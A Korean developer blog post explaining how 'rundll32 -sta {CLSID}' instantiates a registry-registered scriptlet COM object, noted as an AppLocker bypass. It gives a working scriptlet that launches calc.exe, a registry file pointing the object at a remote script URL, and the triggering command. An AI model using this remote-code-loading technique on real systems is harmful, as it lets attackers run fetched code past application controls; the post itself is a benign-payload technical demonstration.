Microsoft MVP성태의 닷넷 이야기
글쓴 사람
정성태 (techsharer at outlook.com)
홈페이지
첨부 파일
 

레지스트리에 등록된 원격지 스크립트 COM 객체 실행 방법

오호... 트위터에서 다음의 글을 보게 되었습니다. ^^

@bohops
; https://twitter.com/bohops/status/1011350358566821891

Interesting way to call a COM CLSID:

rundll32.exe -sta {CLSID}
rundll32.exe /sta {CLSID}

Use this with @subTee's #squiblydoo COM Hijack method for a default AppLocker Bypass

Haven't found any sec-related resources with -sta (single threaded apartment)

Anyone seen this before?

그러니까, COM 객체를 script로 만들 수 있는 기술을 마이크로소프트가 제공하는데요. (정말 오랜만에 보는 군요. scriptlet! 이젠 MSDN에서조차도 자료가 거의 남아 있지 않는데. ^^;)

Scriptlets
; http://www.drdobbs.com/scriptlets/199101569

이 legacy가 아직도 살아있어 Windows 10에서도 동작을 하고 있습니다. 간략하게 기술해 보면, Web 상에 다음과 같은 Script 파일을 보관해 두고,

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Scripting.Dictionary"
    progid="Scripting.Dictionary"
    version="1"
    classid="{00000000-0000-0000-0000-0000000000FF}"
    remotable="true"
    >
</registration>

<script language="JScript">
<![CDATA[

        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    
    
]]>
</script>

</scriptlet>

로컬 PC의 CLSID에 위의 scriptlet COM 객체에 명시한 classid의 값으로 다음과 같이 등록해 줍니다.

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-0000000000FF}]

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-0000000000FF}\InprocServer32]
@="C:\\\\WINDOWS\\\\system32\\\\scrobj.dll"

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-0000000000FF}\ScriptletURL]
@="https://raw.githubusercontent.com/stjeong/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct"

자, 이제 마지막으로 명령행 창을 열고 해당 COM 객체를 생성해 줍니다.

rundll32 -sta {00000000-0000-0000-0000-0000000000FF}

잘 실행되는군요. ^^

rundll_comserver_1.png




[이 글에 대해서 여러분들과 의견을 공유하고 싶습니다. 틀리거나 미흡한 부분 또는 의문 사항이 있으시면 언제든 댓글 남겨주십시오.]







[최초 등록일: ]
[최종 수정일: 6/27/2018]

Creative Commons License
이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이센스에 따라 이용하실 수 있습니다.
by SeongTae Jeong, mailto:techsharer at outlook.com

비밀번호

댓글 작성자
 




... [61]  62  63  64  65  66  67  68  69  70  71  72  73  74  75  ...
NoWriterDateCnt.TitleFile(s)
12107정성태1/10/202010695.NET Framework: 877. C# - 프로세스의 모든 핸들을 열람 - 두 번째 이야기
12106정성태1/8/202012123VC++: 136. C++ - OSR Driver Loader와 같은 Legacy 커널 드라이버 설치 프로그램 제작 [1]
12105정성태1/8/202010763디버깅 기술: 153. C# - PEB를 조작해 로드된 DLL을 숨기는 방법
12104정성태1/7/202011467DDK: 9. 커널 메모리를 읽고 쓰는 NT Legacy driver와 C# 클라이언트 프로그램 [4]
12103정성태1/7/202014162DDK: 8. Visual Studio 2019 + WDK Legacy Driver 제작- Hello World 예제 [1]파일 다운로드2
12102정성태1/6/202011809디버깅 기술: 152. User 권한(Ring 3)의 프로그램에서 _ETHREAD 주소(및 커널 메모리를 읽을 수 있다면 _EPROCESS 주소) 구하는 방법
12101정성태1/5/202011142.NET Framework: 876. C# - PEB(Process Environment Block)를 통해 로드된 모듈 목록 열람
12100정성태1/3/20209161.NET Framework: 875. .NET 3.5 이하에서 IntPtr.Add 사용
12099정성태1/3/202011462디버깅 기술: 151. Windows 10 - Process Explorer로 확인한 Handle 정보를 windbg에서 조회 [1]
12098정성태1/2/202011057.NET Framework: 874. C# - 커널 구조체의 Offset 값을 하드 코딩하지 않고 사용하는 방법 [3]
12097정성태1/2/20209624디버깅 기술: 150. windbg - Wow64, x86, x64에서의 커널 구조체(예: TEB) 구조체 확인
12096정성태12/30/201911631디버깅 기술: 149. C# - DbgEng.dll을 이용한 간단한 디버거 제작 [1]
12095정성태12/27/201913041VC++: 135. C++ - string_view의 동작 방식
12094정성태12/26/201911187.NET Framework: 873. C# - 코드를 통해 PDB 심벌 파일 다운로드 방법
12093정성태12/26/201911198.NET Framework: 872. C# - 로딩된 Native DLL의 export 함수 목록 출력파일 다운로드1
12092정성태12/25/201910611디버깅 기술: 148. cdb.exe를 이용해 (ntdll.dll 등에 정의된) 커널 구조체 출력하는 방법
12091정성태12/25/201912125디버깅 기술: 147. pdb 파일을 다운로드하기 위한 symchk.exe 실행에 필요한 최소 파일 [1]
12090정성태12/24/201910815.NET Framework: 871. .NET AnyCPU로 빌드된 PE 헤더의 로딩 전/후 차이점 [1]파일 다운로드1
12089정성태12/23/201911510디버깅 기술: 146. gflags와 _CrtIsMemoryBlock을 이용한 Heap 메모리 손상 여부 체크
12088정성태12/23/201910494Linux: 28. Linux - 윈도우의 "Run as different user" 기능을 shell에서 실행하는 방법
12087정성태12/21/201910921디버깅 기술: 145. windbg/sos - Dictionary의 entries 배열 내용을 모두 덤프하는 방법 (do_hashtable.py) [1]
12086정성태12/20/201912994디버깅 기술: 144. windbg - Marshal.FreeHGlobal에서 발생한 덤프 분석 사례
12085정성태12/20/201910723오류 유형: 586. iisreset - The data is invalid. (2147942413, 8007000d) 오류 발생 - 두 번째 이야기 [1]
12084정성태12/19/201911373디버깅 기술: 143. windbg/sos - Hashtable의 buckets 배열 내용을 모두 덤프하는 방법 (do_hashtable.py) [1]
12083정성태12/17/201912620Linux: 27. linux - lldb를 이용한 .NET Core 응용 프로그램의 메모리 덤프 분석 방법 [2]
12082정성태12/17/201912471오류 유형: 585. lsof: WARNING: can't stat() fuse.gvfsd-fuse file system
... [61]  62  63  64  65  66  67  68  69  70  71  72  73  74  75  ...